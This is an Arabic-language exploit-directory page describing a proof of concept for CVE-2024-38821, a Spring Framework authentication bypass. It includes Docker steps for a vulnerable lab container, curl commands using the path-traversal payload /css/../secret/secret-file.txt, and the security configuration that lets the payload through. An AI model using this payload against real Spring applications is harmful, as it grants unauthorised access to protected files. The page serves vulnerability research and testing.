Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-38821-POC — استغلال إثبات المفهوم لـ CVE-2024-38821، يوضح تجاوز المصادقة في Spring Framework عبر اجتياز المسار للوصول إلى موارد مقيدة. | Kitploit
أدوات/GitHubGitHub/masa42/cve-2024-38821-poc
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubmasa42/cve-2024-38821-poc

CVE-2024-38821-POC

استغلال إثبات المفهوم لـ CVE-2024-38821، يوضح تجاوز المصادقة في Spring Framework عبر اجتياز المسار للوصول إلى موارد مقيدة.

عرض المستودع
129منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-38821: إثبات المفهوم (PoC): تجاوز المصادقة في إطار عمل Spring

هذا إثبات مفهوم لثغرة CVE-2024-38821

خطوات التنفيذ

  1. قم ببناء صورة Docker (Spring Boot 3.3.4، استنادًا إلى Spring Framework 6.1.13)

    cd vuln
    docker build -t cve-2024-38821-poc .
    
  2. شغّل الحاوية واعرض المنفذ 8080 على الجهاز المضيف

    docker run -d -p 8080:8080 --name cve-2024-38821-poc cve-2024-38821-poc
    
  3. قم بتشغيل الأمر التالي لتنفيذ PoC وتأكيد الثغرة

    curl -v --path-as-is "http://localhost:8080/secret/secret-file.txt" # Expected: 302 response (login required)
    curl -v --path-as-is "http://localhost:8080/css/../secret/secret-file.txt" # Expected: 200 response (bypassed authentication)
    

    إذا نجح الهجوم، سيعرض الرد: This is a secret file.

الشرح

  1. أنشئ SecurityConfig.java لتكوين أذونات الوصول:

    • السماح بالوصول غير المصادق عليه للمسارات تحت /css/.
    • تتطلب مصادقة للمسارات تحت /secret/.
    public SecurityWebFilterChain securityWebFilterChain(ServerHttpSecurity http) {
        return http
            .authorizeExchange(exchange -> exchange
                .pathMatchers("/css/**", "/").permitAll() // Static resources and the top page do not require authentication
                .pathMatchers("/secret/**").authenticated() // Authentication is required for the "secret" path
                .anyExchange().authenticated() // Authentication is required for all other paths
            )
            .formLogin().and() // Enable form-based authentication
            .build();
    }
    
  2. أنشئ الحمولة التالية. بما أن الحمولة تبدأ بـ /css/، فهي تطابق نمط المسار المسموح به. وهي لا تبدأ بـ /secret/، لذا لا تطابق نمط المسار الذي يتطلب المصادقة:

    • المسار: /css/../secret/secret-file.txt
  3. استخدم أمر curl التالي لتنفيذ PoC والتحقق مما إذا كان الهجوم ناجحًا:

    # Note: The --path-as-is option is required to send the request without URL normalization.
    curl -v --path-as-is "http://localhost:8080/css/../secret/secret-file.txt"
    

    إذا نجح الهجوم، سيعرض الرد: This is a secret file.

إخلاء مسؤولية

يُقدَّم هذا PoC لأغراض تعليمية وبحثية أمنية. قبل استخدامه في نظام حقيقي، تأكد من إصلاح الثغرة ومن حصولك على التفويض المناسب. لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام لهذا الكود.

تنزيل الأداة